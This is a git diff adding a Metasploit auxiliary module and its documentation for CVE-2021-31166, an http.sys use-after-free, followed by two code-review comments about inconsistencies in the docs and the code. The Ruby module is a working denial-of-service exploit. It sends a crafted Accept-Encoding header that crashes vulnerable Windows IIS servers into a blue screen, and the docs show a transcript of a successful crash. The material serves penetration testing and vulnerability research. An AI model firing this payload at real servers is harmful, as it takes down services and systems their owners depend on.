diff --git a/documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md b/documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md new file mode 100644 index 000000000000..6aba2f72b700 --- /dev/null +++ b/documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md 
@@ -0,0 +1,108 @@ +## Vulnerable Application +Windows 10 and Windows Server version 20H2 and 2004 servers who do not +have KB5003173 installed to address CVE-2021-31166 are affected. + +The vulnerability occurs due to a use-after-free (UAF) bug in `http.sys`'s `UlpParseContentCoding` +function whereby a local `LIST_ENTRY` item has items appended to it but the `LIST_ENTRY` structure +is not `NULL`'d out after it finished being used. An attacker can abuse this to trigger a code path +that free's every entry of the local `LIST_ENTRY` structure, which will be linked to in the `Request` +object this function uses to handle the incoming request. The `Request` object will then be used later +on in the code resulting in a UAF vulnerability. + +Note that whilst this exploit tries to target IIS servers, in theory any +component that uses `http.sys` could be vulnerable, including client programs +which use `http.sys` to connect to servers. + +The module itself will use this vulnerability to cause a invalid memory access exception error in `http.sys` +by sending a request with a specially crafted `Accept-Encoding` header to the target IIS server. Since +`http.sys` is a kernel module, this will result in a BSOD on the target system. This will cause IIS to go down +for a period of time until the server reboots and IIS restarts again. + +## Verification Steps +1. Start `msfconsole` +1. `use exploit/windows/iis/http_sys_accept_encoding_dos_cve_2021_31166` +1. `set RHOST ` +1. `exploit` +1. **Verify** that the target server is down. + +## Options + +### RHOST + + - **Required** + - Type: **address** + - *No default value* + +IP address or hostname of the target IIS server. + +### RPORT + + - **Required** + - Type: **integer** + - Default value: **80** + +The port on the target server where IIS is running. + +### TARGETURI + + - **Optional** + - Type: **string** + - Default value: **/** + +The base URL of the IIS install on the target server. 
+ +## Scenarios + +### Windows 10 20H2 Build 19042.685 With IIS Installed +```text + ~/git/metasploit-framework │ iis_dos_cve2022_21907 ?18 ./msfconsole + +IIIIII dTb.dTb _.---._ + II 4' v 'B .'"".'/|\`.""'. + II 6. .P : .' / | \ `. : + II 'T;. .;P' '.' / | \ `.' + II 'T; ;P' `. / | \ .' +IIIIII 'YvP' `-.__|__.-' + +I love shells --egypt + + + =[ metasploit v6.1.34-dev-88b17b79fe ] ++ -- --=[ 2209 exploits - 1171 auxiliary - 395 post ] ++ -- --=[ 600 payloads - 45 encoders - 11 nops ] ++ -- --=[ 9 evasion ] + +Metasploit tip: You can use help to view all +available commands + +[*] Starting persistent handler(s)... +msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166 +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options +Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:hos + t:port][...] + RHOSTS yes The target host(s), see https://github.com/rapid + 7/metasploit-framework/wiki/Using-Metasploit + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + TARGETURI / yes The URI of the IIS Server. + VHOST no HTTP server virtual host + +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > set RHOSTS 172.22.216.145 +RHOSTS => 172.22.216.145 +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > exploit +[*] Running module against 172.22.216.145 + +[*] Connecting to target to make sure its alive... +[+] Successfully connected to target. Sending payload... +[+] Payload was sent to the target server. +[*] Checking that the server is down... +[+] Target is down. 
+[*] Auxiliary module execution completed +msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > +``` + +![Metasploit demonstration](https://mauricelambert.github.io/vulnerability/images/CVE-2021-31166_demo.gif "Metasploit demonstration") diff --git a/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb b/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb new file mode 100644 index 000000000000..e6b62478d0bb --- /dev/null +++ b/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb 
@@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Windows IIS HTTP Protocol Stack DOS', + 'Description' => %q{ + This module exploits CVE-2021-31166, a UAF bug in http.sys + when parsing specially crafted Accept-Encoding headers + that was patched by Microsoft in May 2021, on vulnerable + IIS servers. Successful exploitation will result in + the target computer BSOD'ing before subsequently rebooting. + Note that the target IIS server may or may not come back up, + this depends on the target's settings as to whether IIS + is configured to start on reboot. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Max', # Aka @_mxms. Vulnerability discovery + 'Stefan Blair', # Aka @fzzyhd1. Vulnerability discovery + 'Axel Souchet', # Aka @0vercl0k. PoC exploit + 'Maurice LAMBERT ' # msf module + ], + 'Platform' => 'win', + 'References' => [ + ['CVE', '2021-31166'], + ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31166'], + ['URL', 'https://github.com/mauricelambert/CVE-2021-31166'], + ['URL', 'https://twitter.com/metr0/status/1392631376592076805'], + ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166'] + ], + 'DisclosureDate' => '2021-05-11', + 'Notes' => { + 'Stability' => [CRASH_OS_RESTARTS], + 'Reliability' => [IOC_IN_LOGS], + 'SideEffects' => [SCREEN_EFFECTS] + } + ) + ) + + register_options( + [ + OptString.new( + 'TARGETURI', [true, 'The URI of the IIS Server.', '/'] + ) + ] + ) + end + + # This module performs a DOS attack using a simple HTTP request. 
+ def run + print_status('Connecting to target to make sure its alive...') + + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, ''), + 'method' => 'GET' + ) + + if res.nil? + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the target IIS server - no response") + end + + print_good('Successfully connected to target. Sending payload...') + + payload = + "#{Rex::Text.rand_text_alpha(5)}, #{Rex::Text.rand_text_alpha(3)}, ," + + exploit_headers = { + 'Accept-Encoding' => payload + } + + begin + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, ''), + 'timeout' => 1, # short timeout -> the server should not respond + 'method' => 'GET', + 'headers' => exploit_headers + }) + rescue Rex::ConnectionError, Errno::ECONNRESET + print_good('Connection reset by target server or connection failed when sending the malicious payload!') + ensure + print_good('Payload was sent to the target server.') + print_status('Checking that the server is down...') + end + + begin + res = send_request_cgi( + 'uri' => normalize_uri(target_uri.path, ''), + 'method' => 'GET' + ) + + if res.nil? + print_good('Target is down.') + else + print_error('Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.') + end + rescue Rex::ConnectionError, Errno::ECONNRESET + print_good('Target is down.') + end + end +end
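Review bot: the documentation disagrees with the module it describes in three places. Verification step 2 says `use exploit/windows/iis/http_sys_accept_encoding_dos_cve_2021_31166`, but the module lives at `auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166`, as the Scenarios transcript shows; step 3 and the Options section use `RHOST`, whereas `show options` lists `RHOSTS`; and TARGETURI is documented as Optional while the module registers it as required (`show options` marks it `yes`). Fix the path and option names and mark TARGETURI as required. While here, "free's every entry" should be "frees every entry", "cause a invalid memory access" should be "an invalid", and the shell prompt in the transcript shows a branch named `iis_dos_cve2022_21907`, a different CVE, so the transcript is worth re-capturing so it matches this module.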
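Review bot: the `Notes` hash puts `IOC_IN_LOGS` under `'Reliability'`; it is a side-effect constant and belongs in `'SideEffects'` alongside `SCREEN_EFFECTS`, while `'Reliability'` should hold reliability constants or be left empty for a DoS module. Separately, the `ensure` clause in the payload-sending block runs `print_good('Payload was sent to the target server.')` even when the `rescue` branch has just reported that the connection was reset or failed, so a blocked or refused connection produces contradictory output; print the success message on the non-exception path instead. The final liveness check also treats a `nil` response as proof the target is down, but `send_request_cgi` returns `nil` on a plain timeout as well, so a slow but healthy server would be reported as crashed; at minimum reword `print_good('Target is down.')` to say the server did not respond, or retry a couple of times before concluding. Also, `print_status('Connecting to target to make sure its alive...')` should read `it's alive`.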